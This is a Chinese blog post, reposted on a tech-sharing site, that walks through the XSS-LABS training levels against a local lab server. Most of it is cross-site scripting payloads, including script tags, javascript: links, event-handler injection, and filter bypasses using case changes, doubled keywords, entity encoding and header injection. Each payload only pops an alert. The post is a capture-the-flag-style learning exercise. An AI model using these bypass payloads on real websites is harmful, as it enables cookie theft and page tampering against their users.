ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

XSS-LABS

2021-12-22 20:36:55  阅读:164  来源: 互联网

标签:XSS http xss level 192.168 alert LABS &#


level 1

http://192.168.1.136:303/level1.php?name=<script>alert(/xss/)</script>
image

level 2

image
输入:http://192.168.1.136:303/level2.php?keyword=<a href="javascript:alert(/xss/)">test</a>,发现出现">未闭合
image
查看源代码
image
重新闭合输入
http://192.168.1.136:303/level2.php?keyword="><a href="javascript:alert(/xss/)">test</a>

image

level 3

输入测试代码<script "' Oonn>
image
发现 < 和 > 都被转义,这里考虑用javascript事件实现xss
image
' onm ouseover='alert(/xss/)
image

level 4

同上
" onm ouseover="alert(/xss/)

image

level 5

script 和 on都被加了下划线了,这里使用a标签绕过
"><a href="javascript:alert(/xss/)">clickme!</a>

image

level 6

还是script和on加下划线,这次使用大小写绕过
"><Script>alert(/xss/)</Script>

image

level 7

script 和 on 被直接过滤,可以采用双写绕过
"><scscriptript>alert(/xss/)</scscriptript>

image

level 8

javascript:alert(/xss/) 进行Unicode编码&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#47;&#120;&#115;&#115;&#47;&#41;
image

level 9

这里验证了http:// 字段,javas&#99;ript:alert('http://')

image

level 10

发现源代码里面的t_sort 字段,可以进行注入
http://192.168.1.136:303/level10.php?t_sort=click here!" onm ouseover=alert(/xss/) type="text"

image

level 11

referer注入:click" onm ouseover=alert(/xss/) type="text"
image

level 12

User-Agent: 1" onfocus=alert(/xss/) type="text"
image

level 13-15

搭建环境原因,无法测试

level 16

script、/、空格 都被替换成 
这里考虑使用%0a替代空格
keyword=<button%0avalue="click"%0aonclick=alert('xss')>
image

剩下的环境不支持,加载不出来,就没有继续做了

标签:XSS,http,xss,level,192.168,alert,LABS,&#
来源: https://www.cnblogs.com/cl-hj/p/15720945.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有